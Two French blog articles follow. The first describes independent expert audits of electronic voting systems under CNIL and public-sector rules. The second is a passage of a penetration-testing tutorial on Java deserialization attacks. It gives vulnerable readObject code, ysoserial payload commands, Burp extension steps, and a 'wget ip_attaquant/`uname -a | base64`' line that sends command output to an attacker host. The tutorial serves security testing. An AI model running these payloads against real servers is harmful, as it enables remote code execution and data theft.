Bilal Benseddiq, Auteur

Expertise indépendante de systèmes de vote électronique

Bilal Benseddiq — Wed, 17 May 2023 15:14:45 +0000

Introduction

Définition du vote électronique

Le vote électronique est un système de vote dématérialisé, à comptage automatisé, dans lequel les électeurs utilisent des dispositifs électroniques pour enregistrer leur vote.

Le système peut être utilisé à distance, comme dans le cas du vote par internet, ou en personne, comme dans les bureaux de vote équipés de machines à voter.

Quelques utilisations en France

Les premières traces datent de… 1969 !

Le ministre de l’Intérieur Raymond Marcellin fait autoriser l’utilisation de machines à voter 100% mécaniques[i]. En raison de pannes importantes et de la non-diminution des fraudes, ces machines tombent en désuétude, mais la modification faite au code électoral reste.

Une utilisation lors des élections professionnelles

Lors des élections professionnelles du secteur publique de 2018, 5,15 millions d’agents publics ont été appelés à voter via une solution de vote électronique.

En 2022, 5,6 millions d’agents publics des trois versants de la fonction publique sont appelés à voter pour leurs représentants syndicaux au sein des instances représentatives. Le scrutin a eu lieu du 1er au 8 décembre 2022. Il est unique à plus d’un titre : généralisation du vote électronique dans la fonction publique de l’État et mise en place de nouvelles instances de dialogue social[ii].

Des expérimentations en cours pour le vote des Français de l’étranger

Pour les élections de 2017, le Ministère des Affaires Étrangères et du Développement International a mis au point une plateforme de vote en ligne aux français de l’étranger pour les élections législatives.

Quels scrutins ont lieu dans les organisations françaises ?

Dans le secteur privé, depuis 2018 les élections des membres de la délégation du personnel des comités sociaux et économiques (CSE) sont obligatoires pour les entreprises de plus de 11 salariés, à bulletins secrets[iii].

Dans la fonction publique et certaines entreprises du secteur parapublic, il existe aussi des élections à des commissions paritaires ou des commissions techniques paritaires.

Dans tous les cas, l’employeur doit informer tous les quatre ans (sauf accord de branche prévoyant une durée plus courte, comprise entre deux et quatre ans) le personnel par affichage de l’organisation des élections.

Fonctionnement du vote électronique dans un contexte d’élections professionnelles

Avant le vote, l’employeur doit convoquer les élections professionnelles en précisant la date, le lieu et les modalités de scrutin (papier, électronique, ou hybride).

L’organisation des élections repose généralement sur un ou plusieurs bureaux de vote centralisateurs et des bureaux de vote régionaux, selon le volume de scrutins et d’électeurs. Les membres des bureaux sont formés, la solution est recettée, et des élections de tests sont réalisées.

Une fois la solution validée elle est passée en production, et l’élection peut débuter :

Les listes électorales sont établies, les syndicats ou les salariés peuvent vérifier et signaler toute erreur ou omission.
Les candidats peuvent faire campagne auprès des électeurs et présenter leur programme.
Le jour de l’ouverture du scrutin, la solution est scellée en utilisant des clefs de chiffrement privées détenues aux 1/3 par l’administration et aux 2/3 par les organisations syndicales.
Les électeurs votent ensuite selon le calendrier prescrit, les bureaux suivent l’émargement et assistent les électeurs, la cellule de supervision contrôle le bon déroulement et gère les incidents éventuels, et le prestataire de vote est mobilisé au besoin.
Le jour de la clôture des élections, l’intégrité de l’urne est contrôlée, puis le descellement est opéré par l’administration et les organisations syndicales.
Le dépouillement des votes est ensuite effectué sous le contrôle des bureaux de votes centralisateurs.
Les résultats des élections doivent être communiqués aux électeurs, affichés publiquement et transmis à l’inspecteur du travail.
L’urne est à nouveau scellée, et toute la solution (copie des programmes sources et des programmes exécutables, matériels de vote, fichiers d’émargement, de résultats et de sauvegarde et fichiers qui conservent la trace des interventions sur le système) est archivée sous scellés pendant 2 ans minimum.
En cas de contestation, un recours peut être déposé auprès de l’inspecteur du travail ou du tribunal d’instance.

Les enjeux du vote électronique

Opportunités

Facilité de mise en œuvre du scrutin

Le vote électronique est généralement plus efficient à mettre en œuvre que le vote papier, il nécessite moins de travail manuel pour la préparation (impression des affiches de propagande, logistique…), le dépouillement et la communication des résultats. Cela entraîne une réduction des coûts et une amélioration de l’efficacité du processus électoral.

Réduction de l’empreinte carbone

Le vote électronique réduit grandement la dépendance à l’impression papier pour les listes électorales, les documents de propagande, et surtout les bulletins de vote. Il permet également de réduire drastiquement les déplacements en fonction de l’organisation géographique de l’entité organisatrice des scrutins.

D’après une étude de la société Kercia[iv], l’empreinte carbone d’un vote par courrier est plus de deux fois supérieure à celle d’un vote électronique.

Maximisation de la participation et instances élues avec une base électorale plus élargie

Le vote électronique permet une participation plus importante des électeurs.

Une étude menée en Suisse en 2011 a montré que le taux de participation a augmenté de 2,2 %[v] dans les cantons qui ont mis en place le vote électronique par rapport à ceux qui n’ont pas utilisé cette méthode. De même, une étude menée en Estonie en 2014 a montré que l’utilisation du vote électronique avait augmenté la participation électorale de 3 à 4 %[vi].

Les électeurs peuvent voter à distance sans avoir à se déplacer physiquement jusqu’au bureau de vote. Cela peut augmenter la participation des électeurs, en particulier dans un contexte de généralisation du télétravail post-COVID-19.

Accords empreints d’une plus forte assise démocratique

Le vote électronique peut aider à renforcer le dialogue social en permettant une participation plus large et plus accessible des électeurs. Les résultats des élections sont mécaniquement plus probants en augmentant la participation aux scrutins.

Risques

Altération des résultats

Les systèmes de vote électronique peuvent être vulnérables à des attaques de vol de comptes électeur, de vote multiple à un même scrutin par le même électeur, ou encore de compromission des bulletins.

Protection des données personnelles

La mise en œuvre de plateformes de vote électronique doit prendre en compte le risque de collecte excessive de données personnelles sensibles telles que les opinions politiques des électeurs.

Les informations personnelles des électeurs peuvent également être stockées sur des serveurs vulnérables, exposant ces données à des risques de compromission du secret du vote ou de fuites de données.

Transparence des opérations de vote

Il peut être difficile à chaque partie prenante de comprendre comment les votes sont enregistrés et comment les résultats sont compilés, entraînant une méfiance vis-à-vis de la solution et des résultats des élections.

Ces risques doivent être pris en compte et remédiés afin d’en réduire drastiquement la probabilité d’occurrence et/ou leur impact sur le bon déroulement des élections.

Comment se conformer à la réglementation ?

Délibération CNIL 2019-053 du 25 avril 2019

La délibération CNIL n°2019-053 du 25 avril 2019[vii] simplifie et précise les textes de 2010 et 2018. Le processus est le suivant :

Choix du niveau de sécurité (1, 2 ou 3) en fonction d’un questionnaire mis à disposition par la CNIL[viii].
Mise en place d’une plateforme de vote de test (iso-production) en amont des élections, avec appui de l’expert indépendant en cas de questions relatives à la conformité des choix techniques et organisationnels à arbitrer.
Expertise indépendante de la solution visant à évaluer la conformité de la solution aux objectifs de sécurité : selon le niveau de risque défini, les objectifs de sécurité sont plus ou moins stricts. Ceux-ci s’additionnent, par exemple en cas de niveau de risque défini à 3, les objectifs de niveaux 1, 2 et 3 doivent être atteints.

Décret 2011-595 (secteur public)

Une réglementation vient s’ajouter à la délibération CNIL 2019-053 pour la fonction publique et certaines entreprises du secteur parapublic[ix] :

En complément des objectifs de sécurité CNIL, 18 articles composant ce décret doivent être respectés et contrôlés par l’expert indépendant. Les points de contrôle incluent par exemple :

« Au moins 2/3 des clés sont attribuées aux délégués de liste et au moins 1 clé est attribuée au président du bureau de vote ou à son représentant »
« Le scellement est effectué par la combinaison d’au moins 2 clés de chiffrement, dont celle du président du bureau de vote ou de son représentant et celle d’au moins un délégué de liste »
« Un procédé garantit que la liste d’émargement n’est modifiée que par l’ajout d’un émargement, qui émane d’un électeur authentifié réalisant le vote »
« Chaque électeur reçoit au moins quinze jours avant le premier jour du scrutin un moyen d’authentification lui permettant de participer au scrutin – la confidentialité de ce moyen d’authentification doit être garanti »
« Un procédé garantit que l’urne électronique n’est modifiée que par le vote d’un électeur authentifié »

Expertise indépendante

Obligation

« Tout responsable de traitement mettant en œuvre un système de vote par correspondance électronique, notamment via Internet, doit faire expertiser sa solution par un expert indépendant, que la solution de vote soit gérée en interne ou fournie par un prestataire. » – Délibération CNIL 2019-053

Modalités

Quand ?

Cette expertise doit être réalisée :

Avant la mise en place du système de vote électronique
En cas de modification de la conception du système de vote électronique déjà en place
A chaque nouveau scrutin utilisant le système de vote électronique, même s’il a déjà été expertisé

Par qui ?

Par un expert indépendant, qui doit :

Être un informaticien spécialisé dans la sécurité
Ne pas avoir d’intérêt dans la société qui a créé la solution de vote ni dans l’organisme responsable de traitement
Posséder si possible une expérience dans l’analyse des systèmes de vote, en ayant expertisé les systèmes de vote d’au moins deux prestataires différents.

Pourquoi ?

Pour garantir le respect des principes fondamentaux qui commandent les opérations électorales :

Le secret du scrutin
Le caractère personnel et libre du vote
La sincérité des opérations électorales
La surveillance effective du vote par la commission électorale
Le contrôle a posteriori par le juge de l’élection

Démarche de travail type

Notre vision de l’expertise indépendante est illustrée par les grandes étapes décrites dans ce chapitre.

Initialisation et cadrage

Pour initier la mission, une réunion de lancement est organisée avec les interlocuteurs projet.

Cette réunion a pour objectifs de présenter les équipes, définir les jalons et le planning projet, préciser les modalités de suivi de la prestation, les modalités de communication entre les parties (chiffrement des échanges, etc.), recueillir l’existant via collecte de la documentation, et mettre en place la comitologie.

Audit de la solution et accompagnement en expertise

Cette phase centrale de l’expertise s’appuie sur une démarche d’analyse théorique et pratique :

Contrôle de la documentation projet et du cahier des charges
- Il s’agit dès la phase « papier » de s’assurer que tous les points de conformité sont présents et en adéquation avec la règlementation en vigueur :technologies utilisées et mises à jour de ces dernières, hébergement de la solution, sécurité physique, architecture et haute disponibilité, cloisonnement entre les scrutins, techniques de scellement et chiffrement, moyen de constitution, corrélation, communication et suppression des listes électorales, schéma d’authentification des électeurs…
Accompagnement en expertise et avis sécurité
- Il s’agit d’apporter une expertise ponctuelle sur des sujets relatifs au cadre légal et règlementaire lors de la phase de conception et d’implémentation de la solution et des processus (ex : choix des facteurs d’authentification, processus de conservation des clefs de scellement, etc.)
Audit technique de la solution
- Revue d’architecturevisant à contrôler la conformité du cloisonnement physique et logique, de la sécurisation des flux, de l’hébergement, de la haute disponibilité, etc.
- Audit de l’organisation et des processus tels que le scellement, la communication des authentifiant, l’archivage, etc.
- Revue de configuration technique des serveurs-clefs de la solution
- Audit du code source et des mécanismes de chiffrement de la solution en s’appuyant entre autres sur le RGS[x] (Référentiel Général de Sécurité)
- Tests d’intrusion en boite noire et en boîte grise des portails de vote et du back-office de supervision

Observation des élections-test

Cette phase vise à simuler une élection afin de contrôler la bonne application du protocole et des processus vérifiés en amont à l’épreuve du terrain :

Validation du processus de contrôle de conformité
- Lors de cette étape, le but est de vérifier que la technique utilisée pour la vérification de la non-altération du système (prise d’empreinte) fonctionne
Contrôles de la solution en situation de terrain
- Il s’agit de s’assurer, in vivo, que l’ensemble des points évoqués en matière de sécurité et règlementation sont bien en place, par exemple au travers de l’analyse des journaux applicatifs et système, ou des contrôles « aléatoires » : présence de fichiers temporaires contenant des informations sensibles, capacité à collecter des données, etc.
Appui en expertise lors du déroulement du vote et aide à l’adaptation de procédures en cas d’imprévus

Accompagnement lors de l’élection réelle

Les mêmes contrôles que durant les élections-tests sont réalisés, et spécifiquement :

Contrôle d’intégrité du système : Prise d’empreinte des briques essentielles du système (librairies, code, bibliothèques de chiffrement, etc.) et comparaison des empreintes avec celles obtenue pré-scrutin
Respect du cadre règlementaire: Processus de scellement, accès et utilisation des clés de chiffrement/déchiffrement, processus de dépouillement, etc.

Quels écueils et comment les éviter ?

Accès limité aux systèmes

Le contexte de marché à forte expertise des solutions de vote peut pousser les éditeurs à être réticents à partager des informations confidentielles sur leur technologie tels que le code source, dans une logique de protection du secret industriel, ce qui peut limiter la capacité des experts à évaluer la conformité du système.

Afin d’éviter cet écueil, il est essentiel de mettre en œuvre une communication régulière et une transparence totale des actions de l’expert indépendant. Des garanties doivent être fournies quant à la protection de la confidentialité des données recueillies et traitées via des processus et un SI certifié SMSI ou II 901 [xi]Diffusion Restreinte).

Par ailleurs, nous recommandons aux experts indépendants de faire preuve de souplesse dans l’organisation, par exemple en acceptant de consulter le code source exclusivement au sein des locaux de l’éditeur.

Il est enfin à rappeler que la délibération CNIL 2019-053 impose au prestataire de mettre à disposition « le code source correspondant à la version du logiciel effectivement mise en œuvre » à l’expert indépendant.

Méfiance des organisations syndicales et des électeurs

Les organisations syndicales et les électeurs peuvent légitimement s’interroger sur l’indépendance de l’expert et les garanties apportées par l’expertise, entraînant une méfiance vis-à-vis de la solution de vote électronique.

Ces craintes sont fondées et une réponse doit y être apportée par une posture de transparence, et l’apport de preuves factuelles et vérifiables pour chaque observation rapportée durant l’expertise.

Par ailleurs, aucun constat ne doit être formulé de façon ambigüe ou au conditionnel, ni être omis.

Enfin, il est essentiel de présenter les limites de l’exercice d’expertise, et l’impossibilité logique d’apporter une garantie à 100% que le système ne peut être attaqué.

Interprétation de la réglementation

La réglementation disponible n’est pas toujours claire et explicite, notamment :

Les architectures non-standard ne font pas l’objet de règles spécifiques
- Ex : Une architecture reposant sur un SI à cheval entre l’éditeur de la solution SaaS et le SI de l’employeur
Certains termes peuvent être ambigus
- Ex : « Le vote d’un électeur doit être une opération atomique » – l’atomicité étant une notion fonctionnelle plutôt que technique, les protocoles de communication sur Internet ne permettant par exemple pas de contenir l’ensemble du bulletin dans un seul paquet réseau

L’application des standards de référence (type RGS), l’interrogation directe de la CNIL, et l’implémentation d’une solution permettant de répondre au risque en substance sont autant de moyens de remédier à cet écueil.

Conclusion et recommandations

Afin de tirer au mieux parti de l’expertise indépendante et de la factualiser, nous recommandons de combiner la vision conformité réglementaire avec une vision orientée risques et alimentée par l’audit technique (tests d’intrusion, revues de configuration…) dans une logique de sécurisation concrète et pragmatique de la solution respectant le cadre réglementaire.

Cet exercice ne peut être mené de façon efficace et porter ses fruits qu’en embarquant et en sensibilisant toutes les parties prenantes du projet, y compris l’éditeur et les organisations syndicales dès la phase de conception.

Il est enfin nécessaire de garder en tête que le vote électronique est une technologie en évolution constante. Il est probable que de nouvelles méthodes et technologies émergeront à l’avenir, entraînant une évolution de la réglementation. La veille technique et réglementaire est par conséquent un sujet essentiel tant pour les entités organisatrices d’élections que pour les éditeurs et les sociétés d’expertise indépendante.

Pour toute demande d’information ou de devis sur le sujet de l’expertise indépendante de systèmes de vote électronique, nous vous invitons à nous contacter via le formulaire suivant : https://www.wavestone.com/fr/contact/

Tous nos vœux de succès pour l’organisation de vos élections professionnelles !

[i] https://www.legifrance.gouv.fr/jorf/id/JORFTEXT000000511691/

[ii] https://www.economie.gouv.fr/elections-professionnelles-2022-quelques-minutes-pour-quatre-annees

[iii] https://fr.wikipedia.org/wiki/Comit%C3%A9_social_et_%C3%A9conomique

[iv] https://www.kercia.com/vote-electronique

[v] https://www.admin.ch/gov/fr/accueil/documentation/communiques.msg-id-37639.html

[vi] https://www.smartmatic.com/fr/actualites/article/lestonie-atteint-des-taux-records-de-vote-par-internet-grace-a-une-nouvelle-technologie/

[vii] https://www.legifrance.gouv.fr/jorf/id/JORFTEXT000038661239

[viii] https://www.cnil.fr/fr/securite-des-systemes-de-vote-par-internet-la-cnil-actualise-sa-recommandation-de-2010

[ix] https://www.legifrance.gouv.fr/loda/id/JORFTEXT000024079803/

[x] https://www.ssi.gouv.fr/entreprise/reglementation/confiance-numerique/le-referentiel-general-de-securite-rgs/

[xi] https://www.ssi.gouv.fr/guide/recommandations-pour-les-architectures-des-systemes-dinformation-sensibles-ou-diffusion-restreinte/

Cet article Expertise indépendante de systèmes de vote électronique est apparu en premier sur RiskInsight.

Techniques et outils d’attaque sur les moteurs de désérialisation (Java)

Bilal Benseddiq — Wed, 10 Jul 2019 09:00:29 +0000

Introduction

La sérialisation consiste à transformer un objet applicatif en un format de données pouvant être restauré ultérieurement. Ce procédé est utilisé pour sauvegarder des objets ou les envoyer dans le cadre de communications.

Exemple de sérialisation d’une variable de type String en Java:

String name = « Wavestone »;
FileOutputStream file = new FileOutputStream(« file.bin »);
ObjectOutputStream out = new ObjectOutputStream(file);
out.writeObject(name);

Le fichier file.bin contenant l’objet name sérialisé a cette forme :

AC ED 00 05 74 00 09 57 61 76 65 73 74 6f 6e 65 ….t..Wavestone

La chaîne commence par “AC ED” – il s’agit du code hexadécimal identifiant la donnée sérialisée, toutes les données sérialisées commencent par cette valeur.
Le protocole de sérialisation version “00 05”.
Le type de variable String est identifié par le code “74”.
Puis la taille de la variable “00 09”.
Et finalement la variable en elle-même.

La désérialisation est l’inverse de ce processus, prenant des données structurées à partir d’un format et les reconstruisant en un objet. Le format de données le plus répandu pour la sérialisation des données est JSON (dans le passé, le format XML était majoritaire).

Pour reprendre l’exemple en Java sus-cité :

FileInputStream file = new FileInputStream(« file.bin »);
ObjectInputStream out = new ObjectInputStream(file);name = (String)out.readObject();
System.out.println(name);

Le résultat dans la console sera donc

Wavestone

La fonction readObject est appelée pour désérialiser l’objet (à l’aide de ObjectInputStream) – et le convertir en String.

La désérialisation a de multiples cas d’usage pour les développeurs, par exemple (ici en Java) :

Désérialiser un objet “SQLConnection” pour se connecter à une base de données
Désérialiser un objet “User” pour récupérer des informations stockées dans une base de données en exécutant des requêtes SQL spécifiques
Désérialiser un objet “LogFile” pour restaurer les données précédemment enregistrées sur un profil utilisateur

De nombreux langages de programmation offrent une capacité native de sérialisation des objets. Ces formats natifs offrent généralement davantage de fonctionnalités que JSON ou XML, y compris la personnalisation du processus de sérialisation.

Malheureusement, les fonctionnalités de ces mécanismes de désérialisation natifs peuvent être détournées à des fins malveillantes lorsque la donnée à désérialiser est en fait une charge utile forgée spécifiquement par un attaquant pour être interprété comme du code à exécuter.

Les attaques contre les moteurs de désérialisation permettent notamment des attaques par déni de service, de contournement de contrôle d’accès et d’exécution de code à distance (RCE).

Exemple d’attaque : RCE

Cet exemple de code récupère un paramètre appelé csrfValue, qui est un jeton anti-CSRF présent sur une application web, envoyé à l’application sous forme de paramètre HTTP GET.

Pour cela, le paramètre est récupéré sous forme de String puis converti en ByteArrayInputStream et lu via la fonction readObject() pour être désérialisé.

String parameterValue = request.getParameter(« csrfValue »);
…
byte[] csrfBytes =DatatypeConverter.parseBase64Binary(parameterValue);
ByteArrayInputStream bis = new ByteArrayInputStream(csrfBytes);
ObjectInput in = new ObjectInputStream(bis);
csrfToken = (CSRF)in.readObject();

Cette fonction est potentiellement vulnérable: en effet, la fonction readObject() est appelé sur des valeurs envoyées par l’utilisateur en tant que paramètre csrfValue de la requête HTTP.

En effet, la fonction readObject() a pour spécificité de pouvoir être implémentée dans les classes Serializable qui en ont besoin pour lire un objet sérialisé.

Imaginons par exemple que la classe CSRF vue plus haut contienne pour une raison obscure ce morceau de code :

public class CSRF implements Serializable {
…
public String command = « ls »;
…
public void execCommand(){
…
Runtime.getRuntime().exec(this.command);
…
private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException {
…
this.execCommand();
}
}

L’attaquant n’aurait qu’à forger un objet CSRF sérialisé (récupéré par le code plus haut dans csrfValue) contenant un paramètre command contenant la commande de son choix pour exécuter du code arbitrairement sur le serveur.

En effet :

ObjectInputStream ne vérifie pas quelle classe est désérialisée
Il n’y a pas de liste blanche ou noire de classes autorisées à être désérialisées

Ce cas de figure très facile à exploiter d’une implémentation de readObject() exécutant directement du code est toutefois très rare dans la réalité.

Ce qui arrive le plus fréquemment est que l’attaquant trouve une fonction ou une classe vulnérable à la modification de ses paramètres, qui peut appeler une autre fonction ou instancier une autre classe dans son périmètre d’exécution.

Les classes et fonctions disponibles dans le périmètre d’exécution d’une application sont appelées « gadget ». Suite à l’envoi d’une charge malveillante à un premier gadget appelé « kick-off gadget », une chaîne d’appels et d’invocation est lancée jusqu’à tomber sur un gadget qui est vulnérable à l’exécution de code arbitraire, appelé « sink gadget » :

De nombreux sink gadget existent dans les librairies de sérialisation/désérialisation standard, notamment :

Spring AOP (dévoilé par Wouter Coekaerts en 2011)
Commons-ﬁleupload (dévoilé par Arun Babu Neelicattu en 2013)
Groovy (dévoilé par cpnrodzc7 / @frohoff en 2015)
Apache Commons-Collections (dévoilé par @frohoff et @gebl en 2015)
Spring Beans (dévoilé par @frohoff et @gebl en 2015)
Serial DoS (dévoilé par Wouter Coekaerts en 2015)
SpringTx (dévoilé par @zerothinking en 2016)
JDK7 (dévoilé par @frohoff en 2016)
Beanutils (dévoilé par @frohoff en 2016)
Hibernate, MyFaces, C3P0, net.sf.json, ROME (dévoilé par M. Bechler en 2016)
Beanshell (dévoilé par @pwntester et @cschneider4711 en 2016)
JDK7 Rhino (dévoilé par @matthias_kaiser en 2016)

Des outils générant des charges utiles spécialement conçues pour attaquer des gadgets affectés par des vulnérabilités publiques dans les librairies les plus utilisées existent, notamment le très complet ysoserial, développé par Frohoff : https://github.com/frohoff/ysoserial.

Exemple d’attaque : Compromission de compte utilisateur

Si un attaquant contrôle les données qui sont désérialisée par une application, il a alors une influence sur les variables en mémoire et les objets applicatifs. Il peut alors influencer le flux de code utilisant ces variables et ces objets.

Voyons un exemple d’attaque sur un morceau de code utilisant la désérialisation en Java :

public class Session {
public String username;
public boolean loggedIn;public void loadSession(byte[] sessionData) throws Exception {
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(sessionData));
this.username = ois.readUTF();
this.loggedIn = ois.readBoolean();
}
}

La méthode loadSession accepte un tableau d’octets en tant que paramètre et désérialise une chaîne et un booléen de ce tableau d’octets dans les propriétés username et loggedIn de l’objet.

Si un attaquant peut contrôler le contenu du tableau d’octets sessionData transmis à cette méthode, il peut alors contrôler les propriétés de cet objet : username et loggedIn.

Voici un exemple d’utilisation de cet objet Session dans une fonction de changement de mot de passe :

public class UserSettingsController {
public void updatePassword(Session session, String newPassword) throws Exception {
if(session.loggedIn) {
UserModel.updatePassword(session.username, newPassword);
} else {
throw new Exception(« Error: User not logged in. »);
}
}
}

Si le paramètre loggedIn de l’objet session vaut 1, le mot de passe de l’utilisateur dont le username correspond au paramètre idoine de l’objet session est mis à jour avec la valeur newPassword donnée.

Ici, si l’attaquant peut contrôler le contenu du tableau d’octets sessionData alors il pourrait changer le mot de passe de n’importe quel utilisateur !

C’est un exemple simple de « Property Oriented Programming Gadget », un morceau de code sur lequel l’attaquant peut agir non pas en direct mais via les propriétés d’un objet.

Un point important à retenir de cet exemple est qu’un exploit de désérialisation n’implique pas forcément l’envoi de classes ou de code au serveur à exécuter.

L’attaquant envoie simplement des données qui seront intégrées dans propriétés des classes dont le serveur a déjà connaissance afin de manipuler le code existant traitant de ces propriétés.

Un exploit réussi repose donc énormément sur la connaissance du code qui peut être manipulé par désérialisation. D’où beaucoup de difficultés à exploiter les vulnérabilités de type désérialisation malgré l’impact parfois colossal de ce type de failles.

Après la théorie, la pratique

Maintenant que vous savez tout (ou presque) sur la sérialisation/désérialisation Java et ses faiblesses, passons à la pratique :

Comment trouver les fonctions utilisant la désérialisation lors d’un test d’intrusion web et les librairies utilisées ?
Comment attaquer ces fonctions et potentiellement réussir à exécuter du code sur le serveur ?

Trouver les fonctions à attaquer

Méthode 1 : A la main, pour plus de finesse

La première étape de l’audit consiste à identifier l’utilisation de la désérialisation dans l’application auditée. Pour cela, différentes méthodes sont possibles :

Chercher la séquence hexadécimale suivante dans les transactions (capturées par burp) entre votre machine et le serveur : 0xAC ED.
- Cette séquence de 2 octets est appelée « magic number » et est présente au début de chaque objet sérialisé. Elle est suivie du numéro de version, souvent 00 05.
- Attention : Parfois, les objets sérialisés sont en plus encodés en base64, la séquence 0xAC ED devient alors rO0

Chercher des noms de classes Java dans les transactions, tels que java.rmi.dgc.Lease.
- Dans certains cas, les noms de classe Java peuvent apparaître dans un autre format commençant par un « L », se terminant par un « ; » et utilisant des barres obliques pour séparer les parties de l’espace de noms et le nom de la classe (par exemple, « Ljava / rmi / dgc / VMID; »).
- En raison de la spécification du format de sérialisation, d’autres chaînes peuvent être présentes, telles que « sr » pouvant représenter un objet (TC_OBJECT) suivi de sa description de classe (TC_CLASSDESC) ou « xp » pouvant indiquer la fin des annotations de classe, (TC_ENDBLOCKDATA) pour une classe qui n’a pas de super classe (TC_NULL).

Chercher l’entête Content-Type suivant : application/x-java-serialized-object

Après avoir identifié l’utilisation de données sérialisées, il faut identifier l’offset dans ces données où il est possible d’injecter une charge utile.

La cible doit appeler ObjectInputStream.readObject pour désérialiser et instancier un objet. Toutefois, elle peut appeler d’autres méthodes de ObjectInputStream, telles que readInt qui lira simplement un entier à 4 octets dans le stream. La méthode readObject lit les types de contenu suivants à partir d’un flux de sérialisation :

0x70 – TC_NULL
0x71 – TC_REFERENCE
0x72 – TC_CLASSDESC
0x73 – TC_OBJECT
0x74 – TC_STRING
0x75 – TC_ARRAY
0x76 – TC_CLASS
0x7B – TC_EXCEPTION
0x7C – TC_LONGSTRING
0x7D – TC_PROXYCLASSDESC
0x7E – TC_ENUM

Dans les cas les plus simples, la première chose lue dans le flux de sérialisation est directement l’objet à désérialiser, et nous pouvons donc insérer notre charge directement après l’en-tête de sérialisation à 4 octets.

Nous pouvons identifier ces cas en regardant les cinq premiers octets du flux de sérialisation. Si ces cinq octets sont un en-tête de sérialisation à quatre octets (0xAC ED 00 05) suivi d’une des valeurs répertoriées ci-dessus, nous pouvons attaquer la cible en envoyant notre propre en-tête de sérialisation à quatre octets suivis d’un objet malveillant (la charge).

Dans d’autres cas, l’en-tête de sérialisation à quatre octets sera probablement suivi d’un élément TC_BLOCKDATA (0x77) ou d’un élément TC_BLOCKDATALONG (0x7A). Le premier consiste en un unique octet suivi des données de bloc et le second consiste en quatre octets suivi des données de bloc.

Si les données sont suivies de l’un des types d’élément pris en charge par readObject, nous pouvons alors injecter une charge utile après les données de bloc.

Nick Bloor a écrit un outil, SerializationDumper, qui permet de faciliter cette analyse. Voici un exemple d’utilisation :

Dans cet exemple, le flux contient un TC_BLOCKDATA suivi d’un TC_STRING qui peut être remplacé par une charge utile.

Méthode 2 : Automatiquement pour plus d’exhaustivité

Pour détecter des fonctions utilisant la désérialisation de façon automatisée, il est aussi possible d’utiliser l’extension Burp Java Deserialization Scanner en tant que scanner passif, scanner actif, ou pour tester une fonction précise.

Les librairies vulnérables actuellement prises en charge par l’outil sont :

Apache Commons Collections 3 (up to 3.2.1)
Apache Commons Collections 4 (up to 4.4.0)
Spring (up to 4.2.2)
Java 6 and Java 7 (up to Jdk7u21)
Hibernate 5
JSON
Rome
Java 8 (up to Jdk8u20)
Apache Commons BeanUtils

Pour utiliser la fonction de scanner passif ou actif, il suffit d’aller dans l’onglet correspondant de Burp et attendre l’apparition d’éventuelles vulnérabilités :

Pour tester une fonction précise, il faut dans un premier temps intercepter une requête dans Burp, puis réaliser un clic droit et l’envoyer à Java DS :

L’outil permet de déterminer les charges utiles (gadgets) qui semblent fonctionner, donc de deviner les librairies utilisées par l’application pour la désérialisation:

A noter

Le plug-in Java DS repose sur un outil intégré de génération de charges utiles (gadgets) open source : ysoserial. Il est préférable d’utiliser la dernière version de l’outil, car elle inclut les types de charge les plus récents en fonction des vulnérabilités découvertes sur les librairies de sérialisation.

Une fois le projet créé, n’oubliez donc pas de modifier le plug-in Java DS pour qu’il pointe vers le fichier jar ysoserial que vous aurez préalablement téléchargé :

Attaquer les fonctions utilisant la désérialisation

La fonction de désérialisation utilisée par l’application peut :

Être écrite et redéfinie spécifiquement dans la classe de l’objet à désérialiser (override de la méthode readObject)
Être appelée dans une bibliothèque externe, la plus connue étant Apache Commons Collections (fonction Utils.DeserializeFromFile)
De nombreuses autres possibilités existent : méthode readResolve, méthode readExternal, méthode readUnshared, bibliothèque XStream, etc.

L’outil Java Deserialization Scanner aura permis d’identifier la librairie utilisée. La prochaine étape est donc de générer la charge utile (gadget) correspondant à la librairie en question.

Pour cela il existe 3 possibilités :

Générer un payload avec ysoserial puis l’envoyer au serveur
Utiliser l’extension Burp Java Deserialization Scanner
Utiliser l’extension Burp Java Serial Killer

Méthode 1 : YSoSerial

L’une des vulnérabilités les plus importantes liée à la désérialisation a été découverte dans la bibliothèque Apache Commons Collections.

Si une version vulnérable de cette bibliothèque (ou d’une autre bibliothèque vulnérable) est présente sur le système exécutant l’application utilisant la désérialisation, cette vulnérabilité peut entraîner l’exécution de code à distance.

Afin d’exploiter cette vulnérabilité, il est possible d’utiliser l’outil ysoserial, qui contient une collection d’exploits et permet de générer des objets sérialisés malveillants qui exécuteront des commandes lors de la désérialisation.

Il est juste nécessaire de spécifier la bibliothèque vulnérable. Voici un exemple pour Windows :

java -jar ysoserial-master.jar CommonsCollections5 calc.exe > wave.stone

Cela générera un objet sérialisé (fichier wave.stone) pour la bibliothèque vulnérable Apache Commons Collections et l’exploit exécutera la commande « calc.exe ».

Si le code suivant est présent côté serveur :

LogFile objet = new LogFile();
String file = « wave.stone »;// Désérialisation de l’objet
objet = (LogFile)Utils.DeserializeFromFile(file);

Alors après envoi de la charge malveillante au serveur (via Burp), l’output côté serveur sera le suivant :

Deserializing from wave.stone
Exception in thread « main » java.lang.ClassCastException:
java.management/javax.management.BadAttributeValueExpException
cannot be cast to LogFile at LogFiles.main(LogFiles.java:105)

Et le résultat sur le serveur sera l’exécution de calc.exe :

Méthode 2 : Java DS

À la suite de la phase de détection, nous savons qu’une charge utile (gadget) forgé pour CommonsCollections1 fonctionne contre notre cible.

En accédant à l’onglet « Exploiting » de Java DS, il est possible de créer et d’envoyer nos propres charges utiles.

Par exemple, pour tenter de lancer la commande uname -a sur le système Unix distant (si c’est un Unix) on entrera la commande suivante :

Le serveur renvoie ici un autre objet sérialisé en réponse, ce qui ne nous permet absolument pas de savoir si notre commande a réussi ou pas, ni d’avoir sa sortie.

Une technique permettant de valider l’exécution réussie de nos commandes consiste à utiliser un canal auxiliaire basé sur le temps : En mettant en pause le processus en cours d’exécution avec la commande Java Sleep, nous pouvons démontrer avec certitude que l’application est vulnérable en mesurant le temps de réponse du serveur.

Une charge utile basée sur la mise en pause du processus est donc suffisante pour identifier la vulnérabilité, mais si vous avez le temps et voulez aller encore plus loin, il est possible de récupérer cette sortie en déployant un serveur web sur votre machine, et en requêtant votre serveur web depuis le serveur cible.

Pour cela, sur votre machine d’audit, commencez par déployer un serveur web :

python -m SimpleHTTPServer 80

Et l’objectif va être de faire exécuter cette commande au serveur cible :

wget ip_attaquant/`uname -a | base64`

L’exploit de Apache Commons Collections fait transmettre notre commande à Apache Commons exec.

